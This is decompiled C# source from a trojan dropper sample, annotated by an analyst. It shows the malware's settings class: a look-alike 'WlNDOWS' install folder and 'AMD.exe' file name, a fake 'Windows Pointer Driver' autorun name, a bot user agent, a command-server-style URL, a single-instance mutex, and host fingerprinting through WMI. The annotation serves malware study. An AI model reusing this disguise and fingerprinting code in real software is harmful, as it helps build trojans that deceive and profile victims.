// Decompiled with JetBrains decompiler
// Type: Poly.Base_Settings
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe

using System;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;

namespace Poly
{
    /// <summary>
    /// Analyst notes: process-wide configuration and host-profiling state of the decompiled sample
    /// named in the file header. Everything is kept in public static fields, so any other type in
    /// the assembly can read or overwrite it.
    /// Indicators hard-coded in this type: the named mutex <see cref="mutex0"/>, the path
    /// LocalApplicationData + <see cref="FolderName"/> + <see cref="fileName"/>, the value name
    /// <see cref="regName"/>, and the <see cref="userAgent"/> / <see cref="httpURL"/> pair.
    /// Only the mutex and the path are actually used in this file; where the others are consumed
    /// is not visible here.
    /// </summary>
    public class Base_Settings
    {
        // 4098 == 0x1002; passed to API.GetInfo by GetLocale().
        private const uint LOCALE_SENGCOUNTRY = 4098;

        // Flags. Only mutexRunning, isAdmin and wait are written in this file.
        public static bool install = true;
        public static bool mutexRunning;
        public static bool captured;
        public static bool isAdmin;
        public static bool busy = false;

        // Name of the single-instance mutex probed/created by MutexRunning().
        public static string mutex0 = "0x110110xx";

        // filePath is LocalApplicationData + FolderName (set in populateEnvVar).
        public static string filePath;
        public static string fileName = "AMD.exe";
        public static string AppDataRoam;
        public static string AppDataLocal;

        // Second character is a lowercase 'l', not 'I': a look-alike of "WINDOWS".
        public static string FolderName = "\\WlNDOWS\\";

        // Not referenced in this file; presumably an autorun value name - confirm in the caller.
        public static string regName = "Windows Pointer Driver";

        // Not referenced in this file; presumably used for outbound HTTP - confirm in the caller.
        public static string userAgent = "s00tb0t";
        public static string httpURL = "http://www.chr0me.com/about.php";

        // Host profile and command state. status, pcName, hwid and os are filled in here;
        // response, command, mode and interval are only declared.
        public static string status;
        public static string pcName;
        public static string hwid;
        public static string os;
        public static string[] response;
        public static string command;
        public static int mode = 0;
        public static int interval = 40;

        private Mutex mutex;
        public static bool wait = true;

        /// <summary>
        /// Waits for the named mutex to be free, then profiles the host.
        /// Each pass probes the mutex first. While another holder exists the loop sleeps two
        /// seconds and retries; once the pass counter exceeds 5 the process exits with code 0,
        /// whatever that last probe returned. When no holder is found, status becomes "updated",
        /// the loop ends and <see cref="populateEnvVar"/> runs.
        /// </summary>
        public virtual void Initialise()
        {
            for (int attempt = 0; wait; ++attempt)
            {
                mutexRunning = MutexRunning();

                if (attempt > 5)
                {
                    Environment.Exit(0);
                }
                else if (mutexRunning)
                {
                    Console.WriteLine("Do shit... {0}", attempt);
                    status = "Mutex detected";
                    Thread.Sleep(2000);
                }
                else if (!mutexRunning)
                {
                    Console.WriteLine("Shit done.. Mutex gone");
                    status = "updated";
                    wait = false;
                    populateEnvVar();
                }
            }
        }

        /// <summary>Empty in the base type; a hook for overriding types.</summary>
        public virtual void Run()
        {
        }

        /// <summary>
        /// Records machine name, both AppData roots, admin status, the install directory,
        /// the OS label and the hardware id into the static fields, then prints hwid and os
        /// to the console.
        /// </summary>
        private void populateEnvVar()
        {
            pcName = Environment.MachineName;
            AppDataRoam = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            AppDataLocal = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
            isAdmin = getAdminStatus();
            filePath = AppDataLocal + FolderName;

            DetectOS();
            hwid = getUniqueID();

            Console.WriteLine("Successfully initialised Settings");
            Console.Write("hwid is: {0}\nos is: {1}\n", hwid, os);
        }

        /// <summary>
        /// Probes the named mutex <see cref="mutex0"/>.
        /// </summary>
        /// <returns>
        /// true when the mutex could be opened (another holder exists); false otherwise, in which
        /// case this instance creates the mutex and requests initial ownership.
        /// </returns>
        private bool MutexRunning()
        {
            bool alreadyHeld;
            try
            {
                mutex = Mutex.OpenExisting(mutex0);
                Console.WriteLine("Mutex Detected");
                alreadyHeld = true;
            }
            catch
            {
                // Catch-all: any failure to open, not only "does not exist", ends up here.
                mutex = new Mutex(true, mutex0);
                alreadyHeld = false;
            }

            return alreadyHeld;
        }

        /// <summary>
        /// Tells whether the running image is the copy at filePath + fileName.
        /// </summary>
        /// <returns>true when the main module path equals that string exactly (ordinal, case-sensitive).</returns>
        public static bool isExePath()
        {
            string runningImage = Process.GetCurrentProcess().MainModule.FileName;
            string expectedImage = filePath + fileName;
            return runningImage == expectedImage;
        }

        /// <summary>
        /// Reports whether the current Windows identity is in the built-in Administrator role.
        /// </summary>
        /// <returns>The role check result; false if the check throws.</returns>
        public static bool getAdminStatus()
        {
            try
            {
                WindowsIdentity identity = WindowsIdentity.GetCurrent();
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
            catch
            {
                return false;
            }
        }

        /// <summary>
        /// Builds the host identifier: the CPU ProcessorId followed by the video controller
        /// description, passed through Function.MD5Hash (defined elsewhere in the assembly).
        /// </summary>
        public string getUniqueID()
        {
            string cpu = getCPUID();
            string gpu = getGraphicDevice();
            return Function.MD5Hash(cpu + gpu);
        }

        /// <summary>Returns the ProcessorId WMI property of Win32_Processor device CPU0.</summary>
        private string getCPUID()
        {
            return LastWmiValue("SELECT * FROM Win32_Processor WHERE DeviceID = 'CPU0'", "ProcessorId");
        }

        /// <summary>Returns the Description WMI property of the last Win32_VideoController row.</summary>
        private string getGraphicDevice()
        {
            return LastWmiValue("SELECT * FROM Win32_VideoController", "Description");
        }

        /// <summary>
        /// Runs a WQL query against root\CIMV2 and returns the named property of the last row
        /// as a string, or an empty string when the query yields no rows.
        /// </summary>
        private static string LastWmiValue(string wql, string property)
        {
            ManagementObjectSearcher searcher = new ManagementObjectSearcher("root\\CIMV2", wql);
            string value = string.Empty;
            foreach (ManagementBaseObject row in searcher.Get())
            {
                value = Convert.ToString(row[property]);
            }

            return value;
        }

        /// <summary>
        /// Fills <see cref="os"/> with a product label, optional service-pack tags and a bitness
        /// suffix. The bitness suffix is appended only when API.GetVersionEx succeeds.
        /// </summary>
        private void DetectOS()
        {
            OperatingSystem current = Environment.OSVersion;

            string label = "";
            if (current.Platform.ToString() == "Win32NT")
            {
                label = NameForBuild(OSVersionNoRevision(current.Version));
            }

            API.OSVERSIONINFOEX osVersionInfo = new API.OSVERSIONINFOEX();
            osVersionInfo.dwOSVersionInfoSize = Marshal.SizeOf(typeof(API.OSVERSIONINFOEX));

            if (!API.GetVersionEx(ref osVersionInfo))
            {
                os = label;
                return;
            }

            // NOTE(review): the markers are "[H_SPn]" tokens; whether API.OSVERSIONINFOEX ever
            // produces them is not visible in this file.
            string servicePack = osVersionInfo.szCSDVersion.ToString();
            if (servicePack.Contains("[H_SP1]"))
            {
                label += "[SP1]";

                // SP2..SP9 are only tested when the SP1 marker matched, as in the decompiled code.
                string[,] nested =
                {
                    { "[H_SP2]", "[SP2]" },
                    { "[H_SP3]", "[SP3]" },
                    { "[H_SP4]", "[SP4]" },
                    { "[H_SP5]", "[SP5]" },
                    { "[H_SP6]", "[SP6]" },
                    { "[H_SP7]", "[SP7]" },
                    { "[H_SP8]", "[SP8]" },
                    { "[H_SP9]", "[SP9]" },
                };
                for (int row = 0; row < nested.GetLength(0); row++)
                {
                    if (servicePack.Contains(nested[row, 0]))
                    {
                        label += nested[row, 1];
                    }
                }
            }

            os = label + (is64Bit() ? "(64-bit)" : "(32-bit)");
        }

        /// <summary>
        /// Maps a "major.minor.build" string to the product label used in <see cref="os"/>.
        /// The table stops at Windows 7; anything else yields "Unknown ".
        /// </summary>
        private static string NameForBuild(string build)
        {
            switch (build)
            {
                case "4.1.2222":
                    return "Windows 98 ";
                case "4.1.2600":
                    return "Windows 98 SE ";
                case "4.9.3000":
                    return "Windows ME ";
                case "5.0.2195":
                    return "Windows 2000 ";
                case "5.1.2600":
                case "5.2.3790":
                    return "Windows XP ";
                case "6.0.6000":
                case "6.0.6001":
                case "6.0.6002":
                case "6.0.6003":
                    return "Windows Vista ";
                case "6.1.7600":
                case "6.1.7601":
                case "6.1.7602":
                case "6.1.7603":
                    return "Windows 7 ";
                default:
                    return "Unknown ";
            }
        }

        /// <summary>Formats a version as "major.minor.build", leaving out the revision.</summary>
        private static string OSVersionNoRevision(Version ver)
        {
            return string.Join(".", ver.Major.ToString(), ver.Minor.ToString(), ver.Build.ToString());
        }

        /// <summary>Terminates the process with exit code 0.</summary>
        public static void cleanUp()
        {
            Environment.Exit(0);
        }

        /// <summary>
        /// Treats the host as 64-bit when the ProgramW6432 environment variable is set and
        /// non-empty; returns false if reading the variable throws.
        /// </summary>
        private static bool is64Bit()
        {
            try
            {
                string programW6432 = Environment.GetEnvironmentVariable("ProgramW6432");
                return programW6432 != null && programW6432.Length > 0;
            }
            catch
            {
                return false;
            }
        }

        /// <summary>
        /// Returns API.GetInfo for locale constant 4098 (LOCALE_SENGCOUNTRY); API is defined
        /// elsewhere in the assembly.
        /// </summary>
        public static string GetLocale()
        {
            return API.GetInfo(LOCALE_SENGCOUNTRY);
        }
    }
}